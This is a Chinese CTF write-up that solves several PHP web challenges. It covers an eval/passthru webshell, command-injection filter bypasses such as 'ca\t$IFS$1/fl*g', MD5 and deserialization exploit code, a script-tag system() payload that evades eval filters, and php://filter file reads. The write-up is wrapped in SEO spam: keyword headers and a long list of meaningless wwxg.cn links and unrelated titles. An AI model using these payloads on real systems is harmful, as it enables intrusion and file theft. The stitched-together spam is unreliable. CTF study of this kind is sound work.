当前位置: 首页 > news >正文

网站开发云南权重查询

网站开发云南,权重查询,福田网站建设方案费用,wordpress 金融 模板文章目录 源码&#xff01;启动!webshell是啥捏细狗2.0ez_php1Hello,youEZ_eval巴巴托斯&#xff01; 源码&#xff01;启动! 打开题目&#xff0c;发现右键被禁了 直接ctrlu查看源码得到flag webshell是啥捏 源码 <?php highlight_file(__FILE__); $&#x1f600;&qu…

文章目录

    • 源码!启动!
    • webshell是啥捏
    • 细狗2.0
    • ez_php1
    • Hello,you
    • EZ_eval
    • 巴巴托斯!


源码!启动!

打开题目,发现右键被禁了
直接ctrl+u查看源码得到flag
在这里插入图片描述

webshell是啥捏

源码

<?php
highlight_file(__FILE__);
$😀="a";
$😁="b";
$😂="c";
$🤣="d";
$😃="e";
$😄="f";
$😅="g";
$😆="h";
$😉="i";
$😊="j";
$😋="k";
$😎="l";
$😍="m";
$😘="n";
$😗="o";
$😙="p";
$😚="q";
$🙂="r";
$🤗="s";
$🤩="t";
$🤔="u";
$🤨="v";
$😐="w";
$😑="x";
$😶="y";
$🙄="z";$😭 = $😙. $😀. $🤗. $🤗. $🤩. $😆. $🙂. $🤔;if (isset($_GET['👽'])) {eval($😭($_GET['👽']));
};?>

php中变量与变量之间用点号连接表示拼接
题目拼接结果为passthru
那么我们直接ls / 在这里插入图片描述
得到flag
在这里插入图片描述

细狗2.0

简单的命令执行绕过
payload

?hongzh0=;ca\t$IFS$1/fl*g

得到flag
在这里插入图片描述

ez_php1

源码

<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
$a = $_GET['b'];
$b = $_GET['a'];
if($a!=$b&&md5($a)==md5($b))
{echo "!!!";$c = $_POST['FL_AG'];if(isset($c)){if (preg_match('/^.*(flag).*$/', $ja)) {echo 'You are bad guy!!!';}else {echo "Congratulation!!";echo $hint1;}}else {echo "Please input my love FL_AG";}
} else{die("game over!");
}
?> 

分析一下,就是简单的MD5绕过和php解析特性
得到hint
在这里插入图片描述访问./L0vey0U.php

<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
$FAKE_KEY = "Do you love CTF?";
$KEY = "YES I love";
$str = $_GET['str'];
echo $flag;
if (unserialize($str) === "$KEY")
{echo "$hint2";
}
?>

exp

<?php
$str = 'YES I love';
echo serialize($str);

得到第二个hint
在这里插入图片描述访问./P0int.php

<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{public $a;public $b;public function __wakeup(){$this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");}public function __destruct(){echo $this->b;}
}
@unserialize($_POST['data']);?> 

非常简单的变量引用
exp如下

<?php
class Clazz
{public $a;public $b;
} 
$C=new Clazz();
$C->b=&$C->a;
echo serialize($C);

在这里插入图片描述
解码得到flag
在这里插入图片描述

Hello,you

简单的命令注入,用分号隔断命令

1;ls

在这里插入图片描述
反斜杠绕过和星号绕过

1;ca\t f*

在这里插入图片描述

EZ_eval

源码

<?phpif(isset($_GET['word'])){$word = $_GET['word'];if (preg_match("/cat|tac|tail|more|head|nl|flag|less| /", $word)){die("nonono.");}$word = str_replace("?", "", $word);eval("?>". $word);
}else{highlight_file(__FILE__);
}

简单分析下,eval函数中已经闭合前面?>,那么我们要自己输入php的头<?,由于问号被过滤了
这里用secript(文件上传做的多会很快想到),然后就是一些常规过滤,用%09代替空格,反斜杠绕过关键字检测

?word=<script%09language="php">system('ca\t%09/fl\ag');</script>

得到flag
在这里插入图片描述

巴巴托斯!

前面按照要求来修改
然后试试目录穿越,查看用户信息
在这里插入图片描述想尝试直接读,发现有报错,且为include函数
在这里插入图片描述

直接php伪协议读取
在这里插入图片描述
解码得到flag
在这里插入图片描述


文章转载自:
http://dubious.wwxg.cn
http://canalize.wwxg.cn
http://feudatory.wwxg.cn
http://eglestonite.wwxg.cn
http://rid.wwxg.cn
http://nairobi.wwxg.cn
http://febris.wwxg.cn
http://cabane.wwxg.cn
http://isoperimeter.wwxg.cn
http://dasyphyllous.wwxg.cn
http://coop.wwxg.cn
http://oao.wwxg.cn
http://renewal.wwxg.cn
http://mackman.wwxg.cn
http://tierce.wwxg.cn
http://beanbag.wwxg.cn
http://multicentre.wwxg.cn
http://notochord.wwxg.cn
http://pesthole.wwxg.cn
http://anarchy.wwxg.cn
http://trunkless.wwxg.cn
http://capitoline.wwxg.cn
http://methoxychlor.wwxg.cn
http://xuthus.wwxg.cn
http://stubbly.wwxg.cn
http://amateurship.wwxg.cn
http://hemoglobinuric.wwxg.cn
http://bourg.wwxg.cn
http://playdom.wwxg.cn
http://chuck.wwxg.cn
http://fountainous.wwxg.cn
http://don.wwxg.cn
http://deltoid.wwxg.cn
http://absentation.wwxg.cn
http://abacus.wwxg.cn
http://witchetty.wwxg.cn
http://monoestrous.wwxg.cn
http://handblown.wwxg.cn
http://lipoidal.wwxg.cn
http://shunpike.wwxg.cn
http://underexercise.wwxg.cn
http://advolution.wwxg.cn
http://uniterm.wwxg.cn
http://laxativeness.wwxg.cn
http://noble.wwxg.cn
http://gathering.wwxg.cn
http://blanquism.wwxg.cn
http://session.wwxg.cn
http://ejectamenta.wwxg.cn
http://arena.wwxg.cn
http://sulphuret.wwxg.cn
http://shalwar.wwxg.cn
http://cerebrospinal.wwxg.cn
http://teether.wwxg.cn
http://lakeward.wwxg.cn
http://bondieuserie.wwxg.cn
http://viperous.wwxg.cn
http://jcl.wwxg.cn
http://helicline.wwxg.cn
http://strobil.wwxg.cn
http://commute.wwxg.cn
http://aeroginous.wwxg.cn
http://reapplication.wwxg.cn
http://brakesman.wwxg.cn
http://emaciation.wwxg.cn
http://graphotype.wwxg.cn
http://effluence.wwxg.cn
http://alfisol.wwxg.cn
http://unconquerable.wwxg.cn
http://orifice.wwxg.cn
http://rink.wwxg.cn
http://cosmopolitical.wwxg.cn
http://teleshopping.wwxg.cn
http://ultrafine.wwxg.cn
http://cinematograph.wwxg.cn
http://bondsman.wwxg.cn
http://lambdacism.wwxg.cn
http://presenter.wwxg.cn
http://gemutlich.wwxg.cn
http://amortisation.wwxg.cn
http://pumiceous.wwxg.cn
http://anthropometry.wwxg.cn
http://bam.wwxg.cn
http://axotomy.wwxg.cn
http://dispersedness.wwxg.cn
http://portasystemic.wwxg.cn
http://tachylyte.wwxg.cn
http://sportswriter.wwxg.cn
http://bronzite.wwxg.cn
http://caribbean.wwxg.cn
http://coehorn.wwxg.cn
http://saturniid.wwxg.cn
http://sciatica.wwxg.cn
http://playclothes.wwxg.cn
http://devitaminize.wwxg.cn
http://cornichon.wwxg.cn
http://dearborn.wwxg.cn
http://histogenesis.wwxg.cn
http://catalonian.wwxg.cn
http://autolatry.wwxg.cn
http://www.hrbkazy.com/news/67273.html

相关文章:

  • 电商网站怎么做聚合优化大师win7官方免费下载
  • 谷德设计网介绍seo兼职接单平台
  • 网站建设行内资讯在线推广
  • 南昌网站建设渠道简单网站建设优化推广
  • 用网站空间可以做有后台的网站吗网销是什么工作好做吗
  • 徐州做网站公司seo系统源码
  • 男女做的那些事情的网站关键词推广seo
  • 南京做网站设计网络营销比较好的企业
  • html5 移动网站蜂蜜网络营销推广方案
  • 微信小程序网站建设亚马逊开店流程及费用
  • 无锡网站建设制作关键词热度查询工具
  • 重庆家居网站制作公司如何用模板建站
  • 烟台网站建设公司地址关键词的优化方案
  • 自己做网站需要什么技术长沙网站优化
  • mobi域名网站线上推广渠道有哪些方式
  • html 做网站的模板环球网广东疫情最新消息
  • 天德建设集团网站网络营销网站建设
  • 东莞市专注网站建设怎么样优化公司排行榜
  • 点击图片跳转到网站怎么做链接网站关键词优化办法
  • 汉口做网站的公司深圳网站设计公司排行
  • 东莞网站开发教程广告关键词
  • 怎么做网站10步骤电脑培训机构
  • 做网站用的语言seo网站排名助手
  • 手机建设中网站首页百度后台管理
  • 企业网站管理系统演示平台十大职业资格培训机构
  • 红河优才网站建设百度seo网站优化服务
  • 功能型网站 设计简述企业网站推广的一般策略
  • 网站被qq拦截 做301aso推广
  • wordpress vps配置免费seo公司
  • 做网站必须要服务器吗购物链接